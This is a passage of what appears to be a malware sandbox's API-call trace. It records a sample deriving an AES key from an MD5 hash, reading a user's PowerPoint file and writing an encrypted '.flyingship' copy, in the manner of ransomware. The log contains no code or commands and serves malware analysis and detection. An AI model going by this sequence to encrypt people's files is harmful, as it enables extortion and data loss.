lpMsg=0x87f114) returned 0 [0171.956] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0171.956] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.956] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.956] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.956] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.956] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.956] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0171.956] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.957] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0171.959] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.959] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0171.959] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.960] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0171.960] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.961] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.961] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.961] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.961] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.961] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0171.961] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0171.961] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.961] CryptHashData (hHash=0x90ae18, pbData=0x8df1e0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0171.961] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.961] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.961] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0171.961] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.962] CryptDestroyHash (hHash=0x90ae18) returned 1 [0171.963] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\gvll7y--hwx_sucb_5p.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0171.963] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.963] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0171.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0171.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0171.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0171.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0171.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0171.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0171.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0171.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0171.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0171.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0171.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0171.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0171.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0171.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0171.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0171.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0171.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0171.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0171.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0171.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0171.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0171.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0171.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0171.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0171.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0171.965] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml")) returned 0x10 [0171.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0171.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0171.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0171.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0171.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0171.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.966] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.flyingship.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\gvll7y--hwx_sucb_5p.flyingship.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0171.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0171.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0171.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0171.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0171.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0171.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0171.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0171.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0171.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0171.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0171.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0171.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0171.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0171.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0171.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0171.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0171.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0171.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0171.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0171.969] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0171.969] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x6db5, lpOverlapped=0x0) returned 1 [0171.976] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0171.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0171.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6db5) returned 0x9e5190 [0171.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0171.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0171.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0171.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0171.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0171.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6db5) returned 0x9ebf50 [0171.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0171.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.978] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0171.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0171.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6db5) returned 0x9e5190 [0171.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0171.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0171.978] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.978] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0171.979] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.979] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0171.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0171.979] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0171.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6db5) returned 0x9e5190 [0171.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0171.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2768 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0171.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0171.980] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1c8 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0171.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6db5) returned 0x9f2d10 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.981] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0171.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 